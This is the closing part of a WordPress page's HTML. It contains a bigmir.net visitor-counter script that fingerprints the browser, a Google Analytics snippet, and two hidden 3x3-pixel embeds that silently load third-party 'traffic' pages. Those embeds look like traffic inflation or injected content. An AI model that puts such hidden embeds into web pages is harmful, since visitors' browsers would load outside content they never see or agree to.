function BM_Draw(oBM_STAT){
document.write('<table cellpadding="0" cellspacing="0" border="0" style="display:inline;margin-right:4px;"><tr><td><div style="margin:0;padding:0;font-size:1px;width:88px;"><div style="background:url(\'http://i.bigmir.net/cnt/samples/diagonal/b62_top.gif\') no-repeat top;height:1px;line-height:1px;"> </div><div style="font:10px Tahoma;text-align:center;background-color:#FAE8E8;height:15px;"><a href="http://www.bigmir.net/" target="_blank" style="color:#0000ab;text-decoration:none;">bigmir<span style="color:#ff0000;">)</span>net</a></div><div style="height:1px;background:url(\'http://i.bigmir.net/cnt/samples/diagonal/b62_top.gif\') no-repeat bottom;"></div><div style="font:10px Tahoma;padding-left:7px;background:url(\'http://i.bigmir.net/cnt/samples/diagonal/b62_center.gif\');"><div style="padding:4px 6px 0 0;"><div style="float:left;color:#eca8aa;">хиты</div><div style="float:right;color:#eca8aa;font:10px Tahoma;">'+oBM_STAT.hits+'</div></div><br clear="all" /><div style="padding-right:6px;"><div style="float:left;color:#eca8aa;">хосты</div><div style="float:right;color:#eca8aa;font:10px Tahoma;">'+oBM_STAT.hosts+'</div></div><br clear="all" /><div style="padding-right:6px;"><div style="float:left;color:#eca8aa;">всего</div><div style="float:right;color:#eca8aa;font:10px Tahoma;">'+oBM_STAT.total+'</div></div><br clear="all" /><div style="height:3px;"></div></div><div style="background:url(\'http://i.bigmir.net/cnt/samples/diagonal/b62_bottom.gif\') no-repeat top;height:2px;line-height:1px;"> </div></div></td></tr></table>');
}
//-->
</script>
<script type="text/javascript" language="javascript"><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={o:1,v:16935011,s:16935011,t:0,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};
for(var f=self;f!=f.parent;f=f.parent)bm.w++;
try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));
else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}
try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}
try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}
r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400);bm.v^=r.length}
bm.v^=window.location.href.length;for(var x in bm) if(/^[ovstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];
bmD.write('<sc'+'ript type="text/javascript" language="javascript" src="http://c.bigmir.net/?'+bs.join('&')+'"></sc'+'ript>');
//-->
</script>
<noscript>
<a rel="nofollow" href="http://www.bigmir.net/" target="_blank"><img src="http://c.bigmir.net/?v16935011&s16935011&t2" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" border="0" /></a>
</noscript>
<!--bigmir)net TOP 100-->
</noindex><noindex>
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-57387438-1', 'auto');
  ga('send', 'pageview');

</script><br>


</noindex><br>





</div>
		</div><div id="text-4" class="widget widget_text">			<div class="textwidget"><noindex>

<embed width="3" height="3" type="text/html" src="http://newportal.com.ua/traffic/29.html"></embed>
<embed width="3" height="3" type="text/html" src="http://newportal.com.ua/traffic/100378.html"></embed>

</noindex>
</div>
		</div>
</td>
<!-- / Right Sidebar -->

</tr>
<!-- / Main Body -->

<tr>

<!-- Footer -->
<td id="footer" colspan="3">
    Copyright &copy; 2020 - All Rights Reserved<br />Powered by <a href="http://wordpress.org/">WordPress</a> &amp; <a href="http://forum.bytesforall.com/">Atahualpa</a>    
    
    <script type='text/javascript' src='http://rusjev.net/jvrs/wp-includes/js/comment-reply.min.js?ver=3.9.1'></script>
</td>


</tr>

</table><!-- / layout -->
</div><!-- / container -->
</div><!-- / wrapper -->


</body>
</html>